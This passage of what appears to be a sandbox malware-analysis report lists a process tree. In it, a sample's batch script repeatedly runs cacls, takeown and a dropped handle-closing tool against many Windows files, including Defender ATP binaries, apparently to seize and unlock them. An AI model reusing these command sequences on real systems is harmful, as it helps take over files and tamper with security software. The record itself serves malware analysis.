    3⤵
    PID:4836
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:3780
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:5036
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "MsSense.exe" -nobanner
    3⤵
    PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "MsSense.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3252
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4328
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""
  2⤵
  PID:4388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SenseCncProxy.exe" -nobanner
    3⤵
    PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SenseCncProxy.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4892
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:4800
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:4620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4480
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3268
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2536
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4780
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:2472
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "settings.dat" -nobanner
      4⤵
      Executes dropped EXE
      PID:4484
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:4472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:4476
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"
    3⤵
    - Modifies file permissions
    PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "vedatamodel.jfm" -nobanner
    3⤵
    PID:5128
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "vedatamodel.jfm" -nobanner
      4⤵
      Executes dropped EXE
      PID:5144
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  2⤵
  PID:5240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"
    3⤵
    - Modifies file permissions
    PID:5368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    3⤵
    PID:5416
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5432
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5588
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5604
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:5656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:5744
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:5760
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:5808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:5908
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:5924
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:6048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "device.png" -nobanner
    3⤵
    PID:6068
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "device.png" -nobanner
      4⤵
      PID:6084
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""
  2⤵
  PID:6132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"
    3⤵
    - Modifies file permissions
    PID:4888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "utc.app.json" -nobanner
    3⤵
    PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "utc.app.json" -nobanner
      4⤵
      PID:5156
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""
  2⤵
  PID:5336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"
    3⤵
    - Modifies file permissions
    PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "edbres00002.jrs" -nobanner
    3⤵
    PID:5392
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "edbres00002.jrs" -nobanner
      4⤵
      PID:5436
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:5492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5552
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:5580
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:5640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5768
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5764
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:5660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:5972
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:6080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:5980
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:5132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:5136
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:5332
